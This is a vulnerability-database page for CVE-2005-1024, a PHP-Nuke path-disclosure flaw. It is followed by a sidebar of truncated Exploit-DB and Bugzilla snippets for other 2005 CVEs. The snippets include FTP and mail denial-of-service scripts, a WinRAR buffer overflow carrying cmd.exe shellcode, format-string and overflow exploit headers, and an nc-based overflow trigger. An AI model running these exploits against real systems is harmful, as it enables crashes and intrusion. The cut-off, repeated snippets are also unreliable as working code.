CVE-2005-1024
published 2005-05-02CVE-2005-1024: modules.php in PHP-Nuke 6.x to 7.6 allows remote attackers to obtain sensitive information via a direct request to (1) my_headlines, (2) userinfo, or (3)…
PriorityP44medium5CVSS 2.0
AVNACLAuNCPINAN
EPSS
1.73%
74.7th percentile
modules.php in PHP-Nuke 6.x to 7.6 allows remote attackers to obtain sensitive information via a direct request to (1) my_headlines, (2) userinfo, or (3) search, which reveals the path in a PHP error message.
Affected
18 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)
exploitdb·2010-12-29·CVSS 5.0
CVE-2005-3294 [MEDIUM] TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)
TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)
---
#!/usr/bin/python
#
# TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service
#
# CVE-2005-3294
# OSVDB 19992
#
# 12/23/2010
# (C) Emanuele Gentili
#
# Notes:
# I have wrote this exploit because the code published here (1) do not work correctly.
# (1) http://www.exploit-db.com/exploits/12604/
#
import socket
import sys
user="test"
pwd="test"
buffer="\x41"
print("\n TYPSoft FTP Server (V 1.10) RETR CMD Denial Of Service\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.109",21))
data = s.recv(1024)
print("[+] Sending user login...")
s.send("USER " + user + '\r\n')
data = s.recv(1024)
s.send("PASS " + pwd + '\r\n')
data = s.recv(1024)
print("[+] Sending first exploit stage...")
s.send("RETR " + buffe
Exploit-DB
WinRAR 3.30 - 'Filename' Local Buffer Overflow (1)
exploitdb·2006-01-04
CVE-2005-4620 WinRAR 3.30 - 'Filename' Local Buffer Overflow (1)
WinRAR 3.30 - 'Filename' Local Buffer Overflow (1)
---
/* WinRAR Buffer Overflow 3.30 Exploit
*
* Bug founded by: Vredited By Alpha Programmer & Trap-Set U.H Team
* Exploit made by: K4P0
* Contact: [email protected]
*/
#include
#include
int main(void)
{
char EvilBuff[1024];
// Normal cmd.exe shellcode.
char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6"
"\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
"\xF8\x50\xBB\x44\x80\xBF\x77\xFF\xD3";
char jmpesp_offset[] = "\x0F\x98\xF8\x77";
char Prog[1024] = "WinRAR ";
printf("WinRAR Buffer Overflow 3.30 Exploit\n\n");
printf("Bug discovered by: Vredited By Alpha Programmer & Trap-Set U.H Team\n");
printf("Exploit made by: K4P0\n");
memset(EvilBuff, 0x00,
Exploit-DB
Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow
exploitdb·2005-10-25
CVE-2005-3252 Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow
Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow
---
/*
* THCsnortbo 0.3 - Snort BackOrifice PING exploit
* by [email protected]
* THC PUBLIC SOURCE MATERIALS
*
* Bug was found by Internet Security Systems
* http://xforce.iss.net/xforce/alerts/id/207
*
* v0.3 - removed/cleaned up info for public release
* v0.2 - details added, minor changes
* v0.1 - first release
*
* Greetz to all guests at THC's 10th
* Anniversary (TAX) :>
*
* $Id: THCsnortbo.c,v 1.1 2005/10/24 11:38:59 thccvs Exp $
*
*/
/*
* DETAILS
*
* The bug is in spp_bo.c, BoGetDirection() function
* static int BoGetDirection(Packet *p, char *pkt_data) {
* u_int32_t len = 0;
* u_int32_t id = 0;
* u_int32_t l, i;
* char type;
* char buf1[1024];
*
* ...
* buf_ptr = buf1;
* ...
* while ( i buf1 size.
*
* The exchange of data betwee
Exploit-DB
Crob FTP Server 3.6.1 - Remote Stack Overflow
exploitdb·2005-06-03
CVE-2005-1873 Crob FTP Server 3.6.1 - Remote Stack Overflow
Crob FTP Server 3.6.1 - Remote Stack Overflow
---
/*
* CrobFTP remote stack overflow PoC
* ---------------------------------
* Tested on Crob FTP Server 3.6.1, Windows XP
*
* Coded by Leon Juranic
* LSS Security / http://security.lss.hr
*
*/
#include
#include
#include
#pragma comment (lib,"ws2_32")
char *fzz_recv (int sock)
{
fd_set fds;
struct timeval tv;
static char buf[10000];
char *ptr=buf;
int n;
tv.tv_sec = 5;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock,&fds);
if (select(NULL,&fds,NULL,NULL,&tv) != 0) {
if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0);
buf[n-1] = '\0';
printf ("RECV: %s\n",buf);
return buf;
}
else {
return NULL;
}
}
int login (int sock, char *user, char *pass)
{
char buf[1024], *bla;
bla=fzz_recv(sock);
printf ("recv: %s\n",bla);
sprintf (buf,"USER
Exploit-DB
Snmppd - SNMP Proxy Daemon Remote Format String
exploitdb·2005-04-29
CVE-2005-1246 Snmppd - SNMP Proxy Daemon Remote Format String
Snmppd - SNMP Proxy Daemon Remote Format String
---
/*
* Snmppd SNMP proxy daemon format string exploit
*
* cybertronic[at]gmx[dot]net
*
* 04/29/2005
*
* buffer space is 1024 bytes ( MAX_SNMPPD_OID_LEN defined in snmppd-0.4.5/snmppd.h )
*
* Apr 29 16:01:31 ctronic snmppd[6274]: fd 5: Request: XAAAA_804a81e.bfffb9d4.0.0.0.0.35206466.6552203a.73657571.58203a74.41414141
*
* This is annoying... there is no fixed input storage.
* Buffer`s location sometimes varies for 0x980 bytes.
* Below is a short dump. I highjacked the GOT entry
* of strdup. Maybe there are some fixed pointers for
* reliable exploitation. Drop me an email if you have
* any suggestions
*
*
* __strdup
*
* 0xbfffb450: 0x906e6824 0x90909090 0x90909090 0x90909090
* 0xbfffb460: 0x90909090 0x90909090 0x90909090 0x90909090
* 0xbff
Exploit-DB
KNet Web Server 1.04c - Buffer Overflow (Denial of Service) (PoC)
exploitdb·2005-02-25
CVE-2005-0575 KNet Web Server 1.04c - Buffer Overflow (Denial of Service) (PoC)
KNet Web Server 1.04c - Buffer Overflow (Denial of Service) (PoC)
---
/*
-=[--------------------ADVISORY-------------------]=-
-=[
]=-
-=[ Knet
*/
#include
#include
#include
#include
#include
#include
void help(char *program_name);
int main(int argc, char *argv[]) {
struct sockaddr_in trg;
struct hostent *he;
long addr;
int sockfd, buff,rc;
char evilbuf[1024];
char buffer[1024];
char *request;
if(argc h_addr);
memset(&(trg.sin_zero), '\0', 8);
printf("\n\nConnecting to target \t...");
rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
if(rc==0)
{
printf("[Done]\nBuilding evil buffer\t...");
memset(evilbuf,90,1023);
printf("[Done]\nSending evil request \t...");
sprintf(request,"GET %s \n\r\n\r",evilbuf);
send(sockfd,request,strlen(request),0);
printf("[Done]\n\n
Exploit-DB
Foxmail 2.0 - 'MAIL FROM:' Denial of Service
exploitdb·2005-02-07
CVE-2005-0636 Foxmail 2.0 - 'MAIL FROM:' Denial of Service
Foxmail 2.0 - 'MAIL FROM:' Denial of Service
---
#!/usr/bin/python
#Code by OYXin
#oyxin_at_segfault.cn
import socket
import sys
import getopt
def usage():
print "Usage: foxserver.py -h host -p port"
sys.exit(0)
if __name__ == '__main__':
try:
opts, args = getopt.getopt(sys.argv[1:], "h:p:")
except getopt.GetoptError, msg:
print msg
usage()
for o,a in opts:
if o in ["-h"]:
host = a
if o in ["-p"]:
port = int(a)
evilbuf = "MAIL-FROM: " + "\r\n"
evilbuf += "RCPT-TO: [email protected]" + "\r\n"
evilbuf += "Message-ID: 123" + "\r\n"
evilbuf += "ASDF" + "\r\n"
evilbuf += "." + "\r\n"
evilbuf += "QUIT" + "\r\n"
try:
sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd.connect((host, port))
recvbuf = sockfd.recv(1024)
print `recvbuf`
sockfd.send("HELO localhost\r\n"
Exploit-DB
Newspost 2.0/2.1 - Remote Buffer Overflow
exploitdb·2005-02-01
CVE-2005-0101 Newspost 2.0/2.1 - Remote Buffer Overflow
Newspost 2.0/2.1 - Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/12418/info
Newspost is prone to a remote buffer overflow vulnerability due to an unbounded memory copy operation.
The problem occurs in the 'socket_getline()' function of 'socket.c' when the vulnerable client handles NNTP server responses.
Successful exploitation of this issue could potentially lead to arbitrary code execution.
This issue was reported to affect Newspost 2.1.1 and prior, however, other versions may be vulnerable.
Create a server:
perl -e 'print "A" x 1024;print "BBBBCCCCDDDDEEEE"'| nc -v -l -p 119
Connect to it:
newspost -s test -i localhost -f [email protected] -n news.news /etc/hosts
Bugzilla
CVE-2005-0400 ext2 mkdir() directory entry random kernel memory leak
bugzilla·2005-03-29·CVSS 2.1
CVE-2005-0400 [LOW] CVE-2005-0400 ext2 mkdir() directory entry random kernel memory leak
CVE-2005-0400 ext2 mkdir() directory entry random kernel memory leak
A flaw was discovered in ext2 filesystem support affecting 2.4 and 2.6 kernels.
When a new directory is created, the ext2 block written to disk is initialized,
leading to an information leak.
The following script can easily show the problem on Linux 2.4 and 2.6:
#!/bin/sh
FILE=foo
dd if=/dev/zero of=$FILE bs=1k count=8192
mke2fs -F -b 1024 -m0 $FILE
mount -o loop $FILE mnt
for D in `seq 500` ; do mkdir mnt/$D ; done
umount mnt
Using 'strings foo' will reveal the information leak in the file.
Patch committed upstream, see
fixed=2.6-bk (20050325
http://linux.bkbits.net:8080/linux-2.6/cset@4244bfc9vHVlT4nv2o4ys4_sf6vzKA
fixed=2.4-bk (20050325
http://linux.bkbits.net:8080/linux-2.4/cset@424473284plfEOB185qmyHPQyNPq4Q
Bugzilla
CVE-2005-0400 ext2 mkdir() directory entry random kernel memory leak
bugzilla·2005-03-29·CVSS 2.1
CVE-2005-0400 [LOW] CVE-2005-0400 ext2 mkdir() directory entry random kernel memory leak
CVE-2005-0400 ext2 mkdir() directory entry random kernel memory leak
A flaw was discovered in ext2 filesystem support affecting 2.4 and 2.6 kernels.
When a new directory is created, the ext2 block written to disk is initialized,
leading to an information leak.
The following script can easily show the problem on Linux 2.4 and 2.6:
#!/bin/sh
FILE=foo
dd if=/dev/zero of=$FILE bs=1k count=8192
mke2fs -F -b 1024 -m0 $FILE
mount -o loop $FILE mnt
for D in `seq 500` ; do mkdir mnt/$D ; done
umount mnt
Using 'strings foo' will reveal the information leak in the file.
Patch committed upstream, see
fixed=2.6-bk (20050325
http://linux.bkbits.net:8080/linux-2.6/cset@4244bfc9vHVlT4nv2o4ys4_sf6vzKA
fixed=2.4-bk (20050325
http://linux.bkbits.net:8080/linux-2.4/cset@424473284plfEOB185qmyHPQyNPq4Q
Bugzilla
CVE-2005-0400 ext2 mkdir() directory entry random kernel memory leak (ipf)
bugzilla·2005-03-29·CVSS 2.1
CVE-2005-0400 [LOW] CVE-2005-0400 ext2 mkdir() directory entry random kernel memory leak (ipf)
CVE-2005-0400 ext2 mkdir() directory entry random kernel memory leak (ipf)
A flaw was discovered in ext2 filesystem support affecting 2.4 and 2.6 kernels.
When a new directory is created, the ext2 block written to disk is initialized,
leading to an information leak.
The following script can easily show the problem on Linux 2.4 and 2.6:
#!/bin/sh
FILE=foo
dd if=/dev/zero of=$FILE bs=1k count=8192
mke2fs -F -b 1024 -m0 $FILE
mount -o loop $FILE mnt
for D in `seq 500` ; do mkdir mnt/$D ; done
umount mnt
Using 'strings foo' will reveal the information leak in the file.
Patch committed upstream, see
fixed=2.6-bk (20050325
http://linux.bkbits.net:8080/linux-2.6/cset@4244bfc9vHVlT4nv2o4ys4_sf6vzKA
fixed=2.4-bk (20050325
http://linux.bkbits.net:8080/linux-2.4/cset@424473284plfEOB185qmyHPQyNP
http://marc.info/?l=bugtraq&m=111263454308478&w=2http://www.securityreason.com/adv/PHPNuke%206.x-7.6-p1.txthttps://exchange.xforce.ibmcloud.com/vulnerabilities/19953https://exchange.xforce.ibmcloud.com/vulnerabilities/44980http://marc.info/?l=bugtraq&m=111263454308478&w=2http://www.securityreason.com/adv/PHPNuke%206.x-7.6-p1.txthttps://exchange.xforce.ibmcloud.com/vulnerabilities/19953https://exchange.xforce.ibmcloud.com/vulnerabilities/44980
2005-05-02
Published